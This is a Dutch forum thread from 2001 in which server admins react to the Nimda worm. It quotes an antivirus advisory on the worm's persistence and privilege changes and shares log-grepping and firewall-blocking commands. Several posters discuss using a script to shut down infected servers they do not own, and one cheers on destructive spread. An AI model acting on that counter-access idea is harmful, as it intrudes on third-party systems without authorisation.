Acties:

Verwijderd

Topicstarter
Op dinsdag 18 september 2001 23:20 schreef BackSlash32 het volgende:
Godzijdank draai ik geen IIS hier en op het werk, maar ik zie de donkere bui al hangen.

Je kunt er donder op zeggen dat elke breedband ISP nu echt op servers gaat controleren, tenkoste van diegenen die wel verantwoord werken (lees: geen IIS draaien, of zelfs geen MS OS).
Ik heb toch ŜŜ@#$#$! het recht om mijn server hier te runnen, ik betaal er niet voor niks voor en ik veroorzaak geen overlast :P

Ik schreef uurtje geleden ofzo al richting de NLLGG: laat de worm lekker z'n gang gaan, miljoenen computers infecteren, data-loss veroorzaken, servers crashen, het internetten onmogelijk maken, misschien gaan mensen eindelijk hun ogen opendoen |:(

dinsdag 18 september 2001 23:50

Acties:

Verwijderd

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

Central Command is alerting all users of a fast spreading new
Internet worm named Win32.Nimba.A@mm AntiVirus eXpert has
been updated to detect and remove this new worm. Please
update AntiVirus eXpert to obtain protection from this worm.

Name:    Win32.Nimda.A@mm
Aliases:    W32/Nimda.A
Type:    Internet Worm, written in Visual C language
Size:    57344 bytes
Risk:    Medium
ITW:      Yes

Description:

This virus comes through e-mail as an attached file, with the
body of the mail apparently empty but which actually contains
code to use an exploit which will execute the virus when the user
just view the message (if is using Outlook or Outlook Express
without latest Service Packs or patches from Microsoft). When is
installed it copies itself in the system directory with the name
load.exe. Also it copies over the library riched20.dll modifying
itself to be loaded as a DLL (Dinamically Link Library). This DLL
is used by applications that work with Richedit Text Format such
as Wordpad.

To be activated at every reboot the virus modifies system.ini in
the boot section by writing the following line: shell=explorer.exe
load.exe -dontrunold

To spread it uses MAPI (Mailing API) functions to read user^Òs e-
mails from where it extracts SMTP (Simple Mail Transfer
Protocol) addresses and e-mail addresses.

Another method to spread is by using Unicode Web Traversal
exploit similar to CodeBlue. Information and a patch for this
exploit are located at
http://www.microsoft.com/technet/security/bulletin/ms00-078.asp

Also it spreads through local network.

The virus activates the user guest with no password and add it to 
the Administrator group. Also it creates a share for C:\ with all
access rights.

Leaving the library riched20.dll not deleted will reactivate the virus
when a program using this library is executed.

Nuff said.

dinsdag 18 september 2001 23:53

Acties:
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Op dinsdag 18 september 2001 23:31 schreef beelzebubu het volgende:

[..]

Ik heb toch ŜŜ@#$#$! het recht om mijn server hier te runnen, ik betaal er niet voor niks voor en ik veroorzaak geen overlast :P
true, true..

't is alleen zo lullig dat het in je AV staat dat het niet mag.
We hebben tot nu toe een (typisch hollands ;) ) gedoogbeleid meegemaakt, waar wellicht een einde aan komt door dit soort dingen.
Ik schreef uurtje geleden ofzo al richting de NLLGG: laat de worm lekker z'n gang gaan, miljoenen computers infecteren, data-loss veroorzaken, servers crashen, het internetten onmogelijk maken, misschien gaan mensen eindelijk hun ogen opendoen |:(
Wishful thinking ben ik bang.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

dinsdag 18 september 2001 23:56

Acties:

Verwijderd

Topicstarter
Op dinsdag 18 september 2001 23:53 schreef BackSlash32 het volgende:
't is alleen zo lullig dat het in je AV staat dat het niet mag.
We hebben tot nu toe een (typisch hollands ;) ) gedoogbeleid meegemaakt, waar wellicht een einde aan komt door dit soort dingen.
Mijn ISP is de universiteit Utrecht, dan geldt de AV niet voor mij vrees ik ;)
Wishful thinking ben ik bang.
I know |:( :'(

dinsdag 18 september 2001 23:58

Acties:
  • raphidae
  • Registratie: Februari 2001
  • Laatst online: 06-01-2025

raphidae

...antichrist...

Zie ook:

http://www.cnn.com/2001/TECH/internet/09/18/internet.attack.ap/index.html

http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

http://www.securityfocus.com/templates/article.html?id=253

http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml

http://slashdot.org/articles/01/09/18/151203.shtml

http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010918-000005

http://www.merit.edu/mail.archives/nanog/

http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html

http://www.newsbytes.com/news/01/170225.html

Every morning is the dawn of a new error.

woensdag 19 september 2001 00:19

Acties:
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Quote van /. :
I spent all morning decompiling and reading through this thing, to see what it does. the wave file that it attaches to the email is actually an executable, named readme.exe, that contains the package. Its rather nasty. It also messes around with windows resources, and explicitly looks for winzip. Its rather big, so I havent gotten the entire thing understood just yet, but from all Ive tracked out of it so far, it messes with nt lanmanager security settings, explorere settings, and mail settings, as well as mangeling certain files.

And I wasnt kidding about it messing around with resource bundles on the end of windows executables. I havent figured out what its attacheing there, but something is definitely doing it.

And earlier posts were right about the attacking of codered rooted boxes. it also gets other misconfigured iis setups that allow access to cmd some how.

Whats nasty is that since it can come in over email, it got behind the corporate firewall this morning. and since inside most people hadnt bothered to keep their iis servers pathched and secured. So even though we were safe from code red, this one got in and starting mangeling servers.


[-----------------------------]





Here's what wget showed me for one host:

[message/rfc822]

So this thing is really evil:

1. it uses many forms of attack
2. it attacks server _and_ clients
3. it propagates by tftping the load from altering hosts (probably from the host which
did the attack before)
4. it alters the content type for the client infection via http+IE
Yuck :r

Mijn werk voor morgenochtend vroeg:
Stap 1 is Opera/Mozilla op alle 40 clients installeren als default browser
stap 2 Users nogmaals wijzen op attachments (ook al is .exe geblocked)

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

woensdag 19 september 2001 00:34

Acties:
  • Haranaka
  • Registratie: September 2000
  • Laatst online: 05-04 16:45

Haranaka

hoe kan ik met dat commando cat en grep de boel filteren dat hij me alleen de ip adressen (en dan als het even kan geen dubbele) geeft van degene die dus geinfecteerd zijn?

...

woensdag 19 september 2001 00:39

Acties:

Verwijderd

code:
1
2
3

[root httpd]# cat access | grep cmd.exe | wc -l
   2886
[root httpd]#

woensdag 19 september 2001 00:48

Acties:

Verwijderd

Je kan best de URLSCAN installeren, wel van Micro$oft zelf maar toch de moeite. *D

http://www.microsoft.com/technet/security/urlscan.asp

URLScan screens all incoming requests to an IIS web server, and only allows ones to pass that comply with a ruleset created by the administrator. This significantly improves the security of the server by helping ensure that it only responds to valid requests.

The tool allows the administrator to filter requests based on length, character set, content and other factors. A default ruleset is provided, which can be customized to meet the needs of a particular server.

woensdag 19 september 2001 01:05

Acties:

Verwijderd

Op woensdag 19 september 2001 00:34 schreef Haranaka het volgende:
hoe kan ik met dat commando cat en grep de boel filteren dat hij me alleen de ip adressen (en dan als het even kan geen dubbele) geeft van degene die dus geinfecteerd zijn?
cat access_log | grep -i cmd | cut -f1 -d- | uniq
evt nog met | wc -l er achter als je ze wilt tellen..

woensdag 19 september 2001 01:17

Acties:
  • Haranaka
  • Registratie: September 2000
  • Laatst online: 05-04 16:45

Haranaka

code:
1
2
3

Sep 18 15:39:11 Haranaka kernel: Mismatch in TCPACCEPT IN=eth1 OUT= MAC=00:e0:4c:3d:66:43:00:d0:00:97:4f:fc:08:00 
SRC=xxx.xxx.xxx.xxx DST=xxx.xxx.xxx.xxx LEN=44 TOS=0x00 PREC=0x00 
TTL=126 ID=49113 DF PROTO=TCP SPT=2751 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0

Ik ben er nu achter dat deze message en vele als deze dus komen door die worm. Maar wat ik niet zo leuk vind is dat deze message in mijn beeld worden gegooit zodra ze binnen komen. En dat is vaak, de teller staat nu op 1885 :(
Hoe stel ik in dat hij ze wel naar die logs moet schijven maar van mijn beeld moet afblijven?

...

woensdag 19 september 2001 01:21

Acties:
  • Haranaka
  • Registratie: September 2000
  • Laatst online: 05-04 16:45

Haranaka

Op woensdag 19 september 2001 01:05 schreef Yarvieh het volgende:

[..]

cat access_log | grep -i cmd | cut -f1 -d- | uniq
evt nog met | wc -l er achter als je ze wilt tellen..
bedankt, maar die uniq functie die werkt niet echt, ik krijg nu een lijstje met ip adressen, maar er staan wel dezelfden bij.

...

woensdag 19 september 2001 01:44

Acties:

Verwijderd

Damn in slechts 5 uur, alweer bijna 2500 erbij |:(

Dat zijn er ruim 8 per minuut :D
Server is nog nooit zo druk geweest joh.

Eens geld gaan vagen voor het gebruik van mijn bandbreedte.

woensdag 19 september 2001 05:44

Acties:
  • Mior
  • Registratie: Maart 2000
  • Laatst online: 14:37

Mior

code:
1
2
3

b0xx:/var/log/httpd# cat *access* | grep cmd.exe | wc -l
   4145
b0xx:/var/log/httpd#

:Z

woensdag 19 september 2001 07:21

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

Op dinsdag 18 september 2001 22:58 schreef s3n het volgende:

[..]

Is er ook al zo'n leuk scriptje voor windows-iis ?
deze heb ik zelf eventjes geschreven vanmiddag, maar 't stelt niet veel voor om 't zelf eventjes te maken hoor :)

"Happiness is a way of travel, not a destination."
--Roy Goodman

woensdag 19 september 2001 08:06

Acties:

Verwijderd

Topicstarter
Op woensdag 19 september 2001 00:19 schreef BackSlash32 het volgende:
Yuck :r
Nee, deze worm maakt op gratieuze wijze gebruik van de mogelijkheden die MS hem geeft..... Zeg daar maar yuck tegen. Die worm zelf is gewoon slim gebruikt en geeft een topje van de ijsberg van hoeveel veiligheidslekken die die brakke systemen van MS ("Nee hoor, NT is volkomen veilig") hebben.

Ik vind het wel goed dat er eindelijk eens een worm komt die alles verneukt. Mensen moeten hun kop stoten! Anders leren ze het nooit. Laat het de computers formatteren. Laat het de hardware vernietigen. Whatever. INSTALLEER DIE UPDATES DAN EENS! Zo leert men het misschien eens....

woensdag 19 september 2001 09:18

Acties:
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Da's toch nog yuck :r als je ermee/omheen moet werken.

In ieder geval: elke client heeft nu Opera als default browser >:)

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

woensdag 19 september 2001 10:00

Acties:

Verwijderd

Topicstarter
Op woensdag 19 september 2001 09:18 schreef BackSlash32 het volgende:
Da's toch nog yuck :r als je ermee/omheen moet werken.
Ik heb niet voor MS' zooi als mijn OS gekozen en heb nergens last van O-) >:)

woensdag 19 september 2001 10:09

Acties:

Verwijderd

Op dinsdag 18 september 2001 22:08 schreef beelzebubu het volgende:

[..]

Ziet er geweldig uit })

Maar... :(

Mijn apache ondersteunt volgens mij geen PHP :(
Tuurlijk wel...
En ik heb net dat scriptje getest, lijkt goed te werken,
ik moet hem alleen nog effe renamen.
MAAR heeft iemand een idee of dit wel slim is??? :?

woensdag 19 september 2001 10:15

Acties:

Verwijderd

Topicstarter
Op woensdag 19 september 2001 10:09 schreef Mainwave het volgende:

[..]

Tuurlijk wel...
s/ondersteunt geen PHP/ik heb PHP niet geinstalleerd/
MAAR heeft iemand een idee of dit wel slim is??? :?
Als de sufferds zo slim zijn hun server niet up te daten vraag ik af of ze genoeg hersencellen hebben om te snappen dat er uberhaupt een worm opzit. Laat staan dat ze doorhebben dat niet die worm maar jij de server afsloot 8-)

woensdag 19 september 2001 11:39

Acties:
  • Creepy
  • Registratie: Juni 2001
  • Laatst online: 05-05 22:57

Creepy

Tactical Espionage Splatterer

grep cmd.exe access_log | wc -l
18168

Lachu hoor :(

Anyway... in crontab gegooit en op m'n webpagina gezet.
"This machine has been attacked by the nimda worm xxxxxx times" . TOch leuk voor de stats :)

edit:
OOps.. telde wat dubbele dingen

"I had a problem, I solved it with regular expressions. Now I have two problems". That's shows a lack of appreciation for regular expressions: "I know have _star_ problems" --Kevlin Henney

woensdag 19 september 2001 13:01

Acties:
  • LuCarD
  • Registratie: Januari 2000
  • Niet online

LuCarD

Certified BUFH

Op woensdag 19 september 2001 10:09 schreef Mainwave het volgende:

[..]

Tuurlijk wel...
En ik heb net dat scriptje getest, lijkt goed te werken,
ik moet hem alleen nog effe renamen.
MAAR heeft iemand een idee of dit wel slim is??? :?
Dat ligt aan je zelf om te bepalen....

Je bent volgens de letter van de wet strafbaar.... Maar ik denk dat geen een rechter het in zijn hoofd haalt om jouw daar op te veroordelen.

Ik zie het zelf altijd als volgt.

Je ziet man op het spoor staan, hij ziet niet dat de trein er aankomt en hij kan je ook niet horen. Wat doe je .... je rent op hem af en duwt hem "HARDHANDIG" weg van het spoor. Man breekt zijn arm door dat hij valt maar hij is wel gered, jij bent een held of niet?. Hij zou jouw theoretisch kunnen aan klagen voor geweldpleging tegen hem. Hij zou volledig in zijn recht staan. Maar geen 1 rechter die jouw daarvoor zou veroordelen, maar toch.

Programmer - an organism that turns coffee into software.

woensdag 19 september 2001 13:25

Acties:
  • Tordek
  • Registratie: Juli 2001
  • Laatst online: 01-11-2023

Tordek

Check gewoon ff dit adres:

http://www.mcafee.com/anti-virus/viruses/nimda/default.asp?cid=2444

Daar staat alle info over Nimda...

woensdag 19 september 2001 14:45

Acties:
  • Johannes Verelst
  • Registratie: Februari 2001
  • Laatst online: 14-11-2022

Johannes Verelst

Lekker .. zo'n worm :-/

Op m'n werk is het netwerk down gebracht en worden alle computers 1 voor 1 gecontroleerd. Gelukkig heb ik een laptop die in kan bellen :)

Voor een groot bedrijf als dit (paar duizend werknemers) gaat dit weer in de miljoenen lopen, want we kunnen niets doen, en waarschijnlijk duurt het nog wel een paar dagen (CodeRed heeft een week non-productiviteit opgeleverd).

There are no stupid questions, but there are a lot of inquisitive idiots.

woensdag 19 september 2001 16:10

Acties:
  • Creepy
  • Registratie: Juni 2001
  • Laatst online: 05-05 22:57

Creepy

Tactical Espionage Splatterer

Op woensdag 19 september 2001 14:45 schreef Wizard_of_OS het volgende:
Lekker .. zo'n worm :-/

Op m'n werk is het netwerk down gebracht en worden alle computers 1 voor 1 gecontroleerd. Gelukkig heb ik een laptop die in kan bellen :)

Voor een groot bedrijf als dit (paar duizend werknemers) gaat dit weer in de miljoenen lopen, want we kunnen niets doen, en waarschijnlijk duurt het nog wel een paar dagen (CodeRed heeft een week non-productiviteit opgeleverd).
Geef de systeembeheerders een harde schop dat ze hun zooi moeten updaten.. dan was er NIKS aan de hand geweest >:)

"I had a problem, I solved it with regular expressions. Now I have two problems". That's shows a lack of appreciation for regular expressions: "I know have _star_ problems" --Kevlin Henney

woensdag 19 september 2001 16:20

Acties:
  • RG
  • Registratie: Augustus 2000
  • Laatst online: 28-11-2025

RG

Lambda

code:
1
2

rene@elle:/usr/local/apache/logs$ cat access_log | grep cmd.exe | wc -l
   2474

Jemig, dit is echt extreem veel erger dan code red 2. Die heeft in 1 maand even veel hits als deze in 1 dag!

[deze advertentieruimte is te koop]

woensdag 19 september 2001 16:27

Acties:

Verwijderd

Zijn die getallen wel eerlijk? Elke worm-attack geeft een stuk of wat requests per host ..... 2500 / 5? = 500 effectief? :)

woensdag 19 september 2001 16:35

Acties:
  • Prozaq
  • Registratie: Juni 2000
  • Laatst online: 13-04 16:25

Prozaq

mischien is dit wel een leuk moment om 'man newsyslog' onder de aandacht te brengen voordat je var vol staat met apache logfile

woensdag 19 september 2001 16:35

Acties:
  • Prozaq
  • Registratie: Juni 2000
  • Laatst online: 13-04 16:25

Prozaq

je haalt de woorden uit mijn mond, als je kijkt naar de requests die een aanvaller doet staat daar per aanval een aantal keer cmd in. Greppen op cmd levert dus niet het aantal aanvallen op, maar het aantal keer dat ie cmd.exe wil uitvoeren.

woensdag 19 september 2001 17:09

Acties:
  • Johannes Verelst
  • Registratie: Februari 2001
  • Laatst online: 14-11-2022

Johannes Verelst

code:
1

cat access_log | grep scripts | cut -f1 -d" " | sort -u | wc -l

Geeft bij mij 53 unieke hosts
Laat 'wc -l' weg om de hosts te zien en evt. te firewallen:
code:
1

for i in `cat access_log | grep scripts | cut -d" " -f1 | sort -u`; do ipchains -I input 1 -s $i -l -j DENY; done

(linux 2.2.*, hoe het met 2.4 gaat mag iemand anders posten)

There are no stupid questions, but there are a lot of inquisitive idiots.

woensdag 19 september 2001 17:09

Acties:

Verwijderd

code:
1
2
3

root@router:/var/log/apache# grep -c cmd.exe www.tuxed.net-access_log
1595
root@router:/var/log/apache#

woensdag 19 september 2001 17:11

Acties:
  • Creepy
  • Registratie: Juni 2001
  • Laatst online: 05-05 22:57

Creepy

Tactical Espionage Splatterer

grep "/d/winnt/system32/cmd.exe" access_log | wc -l

zo dan... dat gedeelte is WEL per attack uniek.. maar tis maar net hoe je het bekijkt.. ik vind elke scan voor een exploit een attack.. dus per attack zijn dat er dus 16 geloof ik..

"I had a problem, I solved it with regular expressions. Now I have two problems". That's shows a lack of appreciation for regular expressions: "I know have _star_ problems" --Kevlin Henney

woensdag 19 september 2001 17:17

Acties:
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Op woensdag 19 september 2001 10:00 schreef beelzebubu het volgende:

[..]

Ik heb niet voor MS' zooi als mijn OS gekozen en heb nergens last van O-) >:)
Mmmjah... op m'n werk heb ik niks te kiezen qua OS (behalve dan NT4 of win2k) in verband met 39 andere users die 'gewoon gebruiker' zijn, en een Main Office in Engeland wat niets anders toestaat.
Beetje lullig om dan dat argument aan te halen.


Draai ondanks dat lekker Linux+OpenOffice op m'n werk-laptop hoor ;)

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

Pagina: 1 2 Laatste
Reageer